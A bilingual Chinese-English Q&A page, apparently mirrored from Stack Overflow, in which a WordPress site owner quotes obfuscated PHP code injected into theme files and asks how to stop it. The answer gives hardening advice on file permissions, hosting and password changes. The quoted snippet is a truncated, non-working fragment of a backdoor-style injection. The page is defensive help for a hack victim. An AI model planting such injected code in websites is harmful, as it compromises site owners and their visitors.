Wordpress 被黑并添加了 php 代码 [英] Wordpress hacked and php code added
问题描述
我在一个更新的 wordpress 网站上得到了这个代码.
I got this code on an updated wordpress site.
Wordpress 3.3.1,所有插件都是最新的.
插件列表:custom-contact-forms、google-maps-for-wordpress &搜索引擎优化.
Wordpress 3.3.1, and all plugins up to date.
Plugin list: custom-contact-forms, google-maps-for-wordpress & seo-ultimate.
有些主题文件影响到哪里的CHMOD 644,每次我让一个CHMOD 777的文件都这样启动,但不仅会影响777文件,还会影响644文件.
Some theme files affected where CHMOD 644, Every time that I let a file with CHMOD 777 this start, but it will not affect only 777 files, it also affect 644 files.
代码如下:
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioD............okBoVSjr = $eva1tYlbakBcVSir;} ?>
那么,我该如何防止这种情况发生,代码有什么作用?
So, how can I prevent this, and what does the code do?
推荐答案
任何 Wordpress 文件都不应该是 777;最大权限为 755 个文件夹,644 个文件.请参阅强化 WordPress « WordPress Codex.
No Wordpress file should ever be 777; the maximum permissions are 755 folders, 644 files. See Hardening WordPress « WordPress Codex.
您的主机帐户 - 可能是廉价的共享主机 - 可能是黑客攻击的载体.告诉你的主人;可能会找到一个更安全的主机.更改所有密码.扫描您自己的 PC.
Your hosting account - probably inexpensive shared hosting - is probably the hack vector. Tell your host; possibly find a more secure host. Change all passwords. Scan your own PC.
要彻底清理您的 WP 安装和托管帐户,请参阅常见问题解答:我的网站被黑客入侵 « WordPress Codex 和 如何彻底清理被黑的 wordpress 安装 和
To completely clean your WP install and hosting account, see FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress.
这篇关于Wordpress 被黑并添加了 php 代码的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!